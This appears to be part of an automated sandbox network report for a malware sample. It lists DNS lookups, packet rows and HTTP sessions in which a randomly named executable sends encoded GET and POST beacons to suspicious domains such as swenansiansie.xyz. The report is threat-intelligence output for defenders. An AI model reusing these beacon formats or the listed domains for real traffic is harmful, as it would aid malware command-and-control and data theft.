                                                                                                                                                                            Dec 11, 2024 09:40:54.946063995 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946073055 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946177959 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946208954 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946563959 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946701050 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946701050 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.956757069 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:55.005657911 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.034918070 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:55.260469913 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.260493040 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.272542000 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.300374985 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:41:00.886765957 CET6173253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:01.441981077 CET53617321.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:16.148329020 CET6099653192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET53609961.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:31.101196051 CET5361353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET53536131.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:45.836941957 CET6171953192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET53617191.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:00.527029037 CET5114153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:01.474280119 CET53511411.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:36.515873909 CET6154853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:36.685125113 CET5901153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:36.822680950 CET53590111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.068069935 CET53615481.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.587749004 CET5115853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:39.588105917 CET6416153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:39.724489927 CET53511581.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.725071907 CET53641611.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.726303101 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.726597071 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.726963997 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.727137089 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663003922 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663258076 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663700104 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663700104 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.810259104 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.822386980 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.822386980 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.864765882 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.977513075 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977530003 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977539062 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977547884 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977557898 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977612972 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.978101015 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.978180885 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.978245020 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.988754034 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:41.136348009 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.176264048 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:41.292098045 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.302520037 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.332830906 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:51.396008968 CET6403253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:52.410677910 CET6403253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:52.453597069 CET53640321.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.547450066 CET53640321.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 11, 2024 09:42:52.549304008 CET | 192.168.2.5 | 1.1.1.1 | c23b | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                            Dec 11, 2024 09:39:46.905910969 CET192.168.2.51.1.1.10xeb22Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.299418926 CET192.168.2.51.1.1.10xa0c4Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.500873089 CET192.168.2.51.1.1.10xd69fStandard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.734719992 CET192.168.2.51.1.1.10x3adStandard query (0)acdn.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.385991096 CET192.168.2.51.1.1.10x3505Standard query (0)www.swenansiansie.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:22.069008112 CET192.168.2.51.1.1.10xbcf0Standard query (0)www.mp3cevir.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:30.444436073 CET192.168.2.51.1.1.10x60b1Standard query (0)www.spectre.centerA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:45.980247021 CET192.168.2.51.1.1.10xb511Standard query (0)www.synd.funA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:00.886765957 CET192.168.2.51.1.1.10x11fcStandard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.148329020 CET192.168.2.51.1.1.10x39d0Standard query (0)www.wiretap.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.101196051 CET192.168.2.51.1.1.10x2617Standard query (0)www.it2sp8.vipA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:45.836941957 CET192.168.2.51.1.1.10x62bStandard query (0)www.cbprecise.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:00.527029037 CET192.168.2.51.1.1.10xe175Standard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.515873909 CET192.168.2.51.1.1.10xfe35Standard query (0)www.rtpsilva4d.clickA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.685125113 CET192.168.2.51.1.1.10x32d0Standard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.587749004 CET192.168.2.51.1.1.10x9d81Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.588105917 CET192.168.2.51.1.1.10xa5c2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:51.396008968 CET192.168.2.51.1.1.10xb60dStandard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.410677910 CET192.168.2.51.1.1.10xb60dStandard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 11, 2024 09:39:39.925025940 CET1.1.1.1192.168.2.50x3633No error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:40.222278118 CET1.1.1.1192.168.2.50x3633No error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:41.796406984 CET1.1.1.1192.168.2.50x4e4eNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854379892 CET1.1.1.1192.168.2.50xb3d5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854379892 CET1.1.1.1192.168.2.50xb3d5No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854664087 CET1.1.1.1192.168.2.50x1f33No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.474896908 CET1.1.1.1192.168.2.50x44daNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475100994 CET1.1.1.1192.168.2.50x170eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475100994 CET1.1.1.1192.168.2.50x170eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475111961 CET1.1.1.1192.168.2.50x3e50No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475111961 CET1.1.1.1192.168.2.50x3e50No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475881100 CET1.1.1.1192.168.2.50x5ee7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.495547056 CET1.1.1.1192.168.2.50xb3c6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.495547056 CET1.1.1.1192.168.2.50xb3c6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.496345997 CET1.1.1.1192.168.2.50xe0d1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.729001999 CET1.1.1.1192.168.2.50x6024No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.757761002 CET1.1.1.1192.168.2.50x6769No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:47.044199944 CET1.1.1.1192.168.2.50xeb22No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.637772083 CET1.1.1.1192.168.2.50xd69fNo error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)acdn.adnxs.comprod.appnexus.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.1.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.193.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.129.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.65.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)www.swenansiansie.xyzswenansiansie.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)swenansiansie.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)swenansiansie.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:22.379512072 CET1.1.1.1192.168.2.50xbcf0Name error (3)www.mp3cevir.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:30.949043036 CET1.1.1.1192.168.2.50x60b1No error (0)www.spectre.center5.39.10.93A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:42.829586983 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:42.829586983 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:43.831469059 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:43.831469059 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:44.844034910 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:44.844034910 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.453191996 CET1.1.1.1192.168.2.50xb511No error (0)www.synd.fun194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.848608971 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.848608971 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:50.852696896 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:50.852696896 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:01.441981077 CET1.1.1.1192.168.2.50x11fcNo error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)www.wiretap.digitalwiretap.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)wiretap.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)wiretap.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)www.it2sp8.vipit2sp8.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)it2sp8.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)it2sp8.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)www.cbprecise.onlinecbprecise.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)cbprecise.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)cbprecise.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:01.474280119 CET1.1.1.1192.168.2.50xe175No error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:24.771240950 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:24.771240950 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:25.779876947 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:25.779876947 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:26.782510042 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:26.782510042 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:28.797722101 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:28.797722101 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:32.813080072 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:32.813080072 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.822680950 CET1.1.1.1192.168.2.50x32d0No error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
Dec 11, 2024 09:42:37.068069935 CET | 1.1.1.1 | 192.168.2.5 | 0xfe35 | No error (0) | www.rtpsilva4d.click | rtpsilva4d.click | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:42:37.068069935 CET | 1.1.1.1 | 192.168.2.5 | 0xfe35 | No error (0) | rtpsilva4d.click | | 67.223.117.169 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:42:39.724489927 CET | 1.1.1.1 | 192.168.2.5 | 0x9d81 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:42:39.724489927 CET | 1.1.1.1 | 192.168.2.5 | 0x9d81 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:42:39.725071907 CET | 1.1.1.1 | 192.168.2.5 | 0xa5c2 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 11, 2024 09:42:52.453597069 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | www.restobarbebek.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:42:52.453597069 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:42:52.453597069 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:42:52.547450066 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | www.restobarbebek.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:42:52.547450066 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:42:52.547450066 CET | 1.1.1.1 | 192.168.2.5 | 0xb60d | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49769 | 185.106.176.204 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:39:40.533396959 CET | 547 | OUT | GET /enzp/?rJl09=1ZZ8JloHsT&x6lPJLCP=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwj9LP9u3P+B96vBaOMx3H/c3knsZvSPscaH9VeTyek1Wueg== HTTP/1.1
                                                                                                                                                                            Host: www.sidqwdf.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49927 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:07.995930910 CET | 819 | OUT | POST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgSxv2+ILl3ER8OXDOpKjXrTaXPftatPdd50okl225rtNrlwwxb3orwMKx4a0inMKEODxj7SJ/d38G+L02SE2NLSQpiPB8zY4NvuVondHfmLyhhB1aMm1Hv98/1GnwYdazaDIIFcmnubQb8PvhhqstkzHG9OqS36mavumom902wZNeXYXejH5PxIAIdA=
Dec 11, 2024 09:40:09.077990055 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49934 | 3.33.130.190 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:40:10.659851074 CET | 839 | OUT | POST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
